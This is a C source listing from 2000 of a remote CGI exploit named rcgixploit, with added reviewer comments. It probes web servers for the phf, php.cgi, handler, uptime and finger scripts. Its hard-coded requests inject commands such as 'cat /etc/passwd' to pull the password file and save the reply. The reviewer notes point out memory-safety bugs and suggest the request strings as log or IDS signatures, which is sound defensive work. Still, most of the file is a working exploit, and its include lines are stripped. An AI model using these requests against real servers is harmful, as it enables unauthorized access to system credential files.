/*
 * DESIGNER: ZinC_Sh(C) E-Mail: zinc_sh@hotmail.com
 *
 * DATE: Mon Feb 14 15:28:19 GMT+2 2000 @601
 *
 * MADE ON: linux SLackWarE.-
 *
 * GREETINGS: Packo, BlackSouL.-
 *
 * COMPILE: gcc -o rcgix rcgixploit.c
 *
 * DESCRIPTION: Remote Cgi Exploit, looking For PHF ,PHP ,HANDLER ,UPTIME,
 *              FINGER and try to Collect Useful FILES such as /etc/passwd.-
 *
 *
 * P.S. DO NOT ABUSE IT.-
 *
 * May The Poula Kapribekou Be With You...
 */

/*
 * Reviewer notes on this listing:
 *
 *  - One run opens one TCP connection, sends exactly one of the five fixed
 *    HTTP/1.0 GET requests defined below, reads one chunk of the reply and
 *    reports a hit if the text "200 OK" occurs anywhere in that chunk.
 *  - The request lines are compile-time constants, so the paths and query
 *    strings in the macros below are directly usable as match strings for
 *    web-server access logs or IDS rules.
 *  - A "200 OK" match only shows that the server answered the URL with
 *    that text; the code never checks that the body contains the file or
 *    command output it asked for.
 *  - The program has several memory-safety and error-handling defects of
 *    its own; they are marked NOTE(review) where they occur.
 *  - NOTE(review): removing unused sample programs from cgi-bin is the
 *    usual mitigation for this class of probe; nothing in this file shows
 *    which server versions are affected.
 */

/*
 * NOTE(review): the twelve header names below are missing from this copy
 * (the <...> part of each directive appears to have been stripped during
 * extraction), so the listing does not preprocess as shown. The calls used
 * in the file (printf/fopen, exit/atoi/system, memset/strstr, close,
 * socket/connect/send/recv, htons, gethostbyname) presumably came from
 * <stdio.h>, <stdlib.h>, <string.h>, <unistd.h>, <sys/socket.h>,
 * <netinet/in.h> and <netdb.h> among others; confirm against an original
 * copy.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Exit status used on every failure path, including the usage screen. */
#define OXO 1
/* Default TCP port when no third argument is given. */
#define PORT 80
/* Substring searched for in the reply to decide "found". */
#define STRING "200 OK"

/*
 * The five fixed request lines. %0a and %20 are URL-encoded newline and
 * space. Each ends in "\n\n" (bare LF, not CRLF). The first three ask for
 * /etc/passwd, the last two only run uptime and finger.
 */
#define PHF "GET /cgi-bin/phf/?Qalias=X%0acat%20/etc/passwd HTTP/1.0\n\n"
#define PHP "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0\n\n"
#define HANDLER "GET /cgi-bin/handler?cat%20/etc/passwd HTTP/1.0\n\n"
#define UPTIME "GET /cgi-bin/uptime HTTP/1.0\n\n"
#define FINGER "GET /cgi-bin/finger?root HTTP/1.0\n\n"

/*
 * Print the two-line usage text to stderr, using ARG as the program name.
 *
 * NOTE(review): declared to return int but has no return statement; main
 * ignores the result. The argument placeholders in both format strings look
 * stripped in this copy (presumably <cgi-number> <host> <port>); confirm
 * against an original.
 */
int usage(char *ARG)
{
    fprintf(stderr,"Usage: %s .-\n",ARG);
    fprintf(stderr,"Examp: %s <2> <80>.-\n\n",ARG);
}

/* Print the one-line banner to stdout. */
void comm(void)
{
    printf("-[ Remote Cgi Exploit ]- By -[ ZinC_Sh(C) ]-\n");
}

/*
 * Entry point.
 *
 *   argv[1]  selector character '1'..'5' (see menu() and switching())
 *   argv[2]  host name, resolved with gethostbyname()
 *   argv[3]  optional TCP port; PORT (80) when absent
 *
 * Returns 0 after the probe, or exits with OXO on a usage, resolve, socket
 * or connect error.
 *
 * NOTE(review): switching(), menu() and poula_kapribekou() are called here
 * before any declaration of them is visible, which relies on pre-C99
 * implicit function declarations.
 */
int main(int argc, char **argv)
{
    struct sockaddr_in addr;
    struct hostent *rh;
    FILE *fd;
    char buffer[BUFSIZ];
    char for_switch;        /* a single char; see the sscanf note below */
    int result;
    int con,sock;
    int ptr;                /* despite the name, this is the port number */

    /* Exactly two or three arguments are accepted. */
    if (argc < 3 || argc > 4){
        usage(argv[0]);
        menu();
        comm();
        poula_kapribekou();
        exit(OXO);
    }

    if((rh=gethostbyname(argv[2])) == NULL) {
        perror("gethostbyname");
        exit(OXO);
    }

    /* Zero the reply buffer so a short reply is NUL-terminated. */
    memset(buffer,0,BUFSIZ);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) {
        perror("Socket");
        exit(OXO);
    }

    /*
     * With argc == 3, argv[3] is the terminating NULL entry of argv.
     * NOTE(review): atoi() reports no errors, and htons() below keeps only
     * the low 16 bits, so a non-numeric or out-of-range port is silently
     * turned into some other port.
     */
    if (argv[3] == NULL)
        ptr=PORT;
    else
        ptr=atoi(argv[3]);

    addr.sin_family = AF_INET;
    addr.sin_port = htons(ptr);
    /* Only the first address returned by the resolver is used. */
    addr.sin_addr = *((struct in_addr *)rh->h_addr);
    bzero(&(addr.sin_zero),8);

    if ((con=connect(sock,(struct sockaddr *)&addr, sizeof(addr))) != 0) {
        perror("connect");
        fprintf(stderr,"Can Not Connect To The Remote Host\n");
        exit(OXO);
    }

    /*
     * NOTE(review): stack buffer overflow. "%s" copies all of argv[1] plus
     * a terminating NUL into for_switch, which is a one-byte object; even a
     * one-character argument writes two bytes. Reading argv[1][0] directly
     * would avoid this.
     * The selector is also parsed only after connect(), so an invalid
     * selector still opens a TCP connection to the host.
     */
    sscanf(argv[1],"%s",&for_switch);
    result=switching(for_switch);

    /*
     * The five branches below are identical apart from the request macro,
     * the messages and the output file name.
     *
     * NOTE(review), applying to every branch:
     *  - sizeof(X) counts the string's terminating NUL, so one extra zero
     *    byte is sent after the request; the send() result is ignored.
     *  - recv() is called once and its result is ignored, so only the first
     *    chunk of the reply is seen and errors go unnoticed. If that chunk
     *    fills all BUFSIZ bytes, no NUL terminator is left and
     *    strstr()/fputs() read past the end of buffer.
     *  - fopen() is not checked before fputs()/fclose(); a failed open
     *    passes NULL to both. Mode "a" appends to any existing file.
     *  - system() starts lynx through the shell, found via PATH, on a file
     *    whose content came entirely from the remote server.
     */
    if (result == 1) {
        send(sock,PHF,sizeof(PHF),0);
        recv(sock,buffer,sizeof(buffer),0);
        if ((strstr(buffer,STRING)) != 0 ) {
            printf("\nFOUND! PHF Script on The Remote Host.-\n");
            printf("Wait, LoadInG Lynx...\n");
            fd=fopen("PHF.results","a");
            fputs(buffer,fd);
            fclose(fd);
            system("lynx PHF.results");
        } else {
            printf("\nPHF Script Not Found\n");
        }
    }

    if (result == 2) {
        send(sock,PHP,sizeof(PHP),0);
        recv(sock,buffer,sizeof(buffer),0);
        if ((strstr(buffer,STRING)) != 0 ) {
            printf("\nFOUND! PHP Script on The Remote Host.-\n");
            printf("Wait, LoadInG Lynx...\n");
            fd=fopen("PHP.results","a");
            fputs(buffer,fd);
            fclose(fd);
            system("lynx PHP.results");
        } else {
            printf("\nPHP Script Not Found\n");
        }
    }

    if (result == 3) {
        send(sock,HANDLER,sizeof(HANDLER),0);
        recv(sock,buffer,sizeof(buffer),0);
        if ((strstr(buffer,STRING)) != 0 ) {
            printf("\nFOUND! HANDLER Script on The Remote Host.-\n");
            printf("Wait, LoadInG Lynx...\n");
            fd=fopen("HANDLER.results","a");
            fputs(buffer,fd);
            fclose(fd);
            system("lynx HANDLER.results");
        } else {
            printf("\nHANDLER Script Not Found\n");
        }
    }

    if (result == 4) {
        send(sock,UPTIME,sizeof(UPTIME),0);
        recv(sock,buffer,sizeof(buffer),0);
        if ((strstr(buffer,STRING)) != 0 ) {
            printf("\nFOUND! UPTIME Script on The Remote Host.-\n");
            printf("Wait, LoadInG Lynx...\n");
            fd=fopen("UPTIME.results","a");
            fputs(buffer,fd);
            fclose(fd);
            system("lynx UPTIME.results");
        } else {
            printf("\nUPTIME Script Not Found\n");
        }
    }

    if (result == 5) {
        send(sock,FINGER,sizeof(FINGER),0);
        recv(sock,buffer,sizeof(buffer),0);
        if ((strstr(buffer,STRING)) != 0 ) {
            printf("\nFOUND! FINGER Script on The Remote Host.-\n");
            printf("Wait, LoadInG Lynx...\n");
            fd=fopen("FINGER.results","a");
            fputs(buffer,fd);
            fclose(fd);
            system("lynx FINGER.results");
        } else {
            printf("\nFINGER Script Not Found\n");
        }
    }

    close(sock);
    return 0;
}

/*
 * Map the selector character CMD ('1'..'5') to the integer 1..5 and print
 * a progress message for the chosen probe.
 *
 * NOTE(review): the default case prints an error and breaks out of the
 * switch, after which control reaches the end of the function without a
 * return statement. main() stores and tests the result, so the value is
 * indeterminate for an invalid selector and could match 1..5 by accident.
 */
int switching(int CMD)
{
    switch(CMD) {
    case '1':{
        printf ("Looking For phf Script on The Remote Machine.-\n");
        printf ("Wait...");
        return 1;
    }
    case '2':{
        printf ("Looking For php Script on The Remote Machine.-\n");
        printf ("Wait...");
        return 2;
    }
    case '3':{
        printf ("Looking For handler Script on The Remote Machine.-\n");
        printf ("Wait...");
        return 3;
    }
    case '4':{
        printf ("Looking For uptime Script on The Remote Machine.-\n");
        printf ("Wait...");
        return 4;
    }
    case '5':{
        printf ("Looking For finger Script on The Remote Machine.-\n");
        printf ("Wait...");
        return 5;
    }
    default :{
        printf ("What The Fuck IS This ??? Choose a Cgi-N From The List.-\n");
        break;
    }
    }
}

/*
 * Print the sign-off line to stdout.
 * NOTE(review): no return type is given (pre-C99 implicit int) and nothing
 * is returned.
 */
poula_kapribekou(void)
{
    printf("-[ May The Poula KApribekou Be With YOu... ]-\n");
}

/*
 * Print the selector table shown with the usage text: one row per probe,
 * numbered 1..5 to match switching().
 * NOTE(review): no return type is given (pre-C99 implicit int) and nothing
 * is returned. The column padding inside the strings looks collapsed in
 * this copy, so the table probably no longer lines up.
 */
menu(void)
{
    printf("|N| CGIs |------------------------| DESCRIPTION |----------------------|\n");
    printf("|-|---------|-------------------------------------------------------------|\n");
    printf("|1| phf)| phf, Looking For /etc/passwd file on The Remote machine |\n");
    printf("|2| php)| PHP.cgi, Looking For /etc/passwd file on The Remote machine |\n");
    printf("|3| handler)| Handler, Looking For /etc/passwd file on The Remote machine |\n");
    printf("|4| uptime)| uptime, Looking for (Time,date,Users) on the Remote machine |\n");
    printf("|5| finger)| Finger, Execute 'finger Command' Through the Web |\n");
    printf("|-|---------|-------------------------------------------------------------|\n\n");
}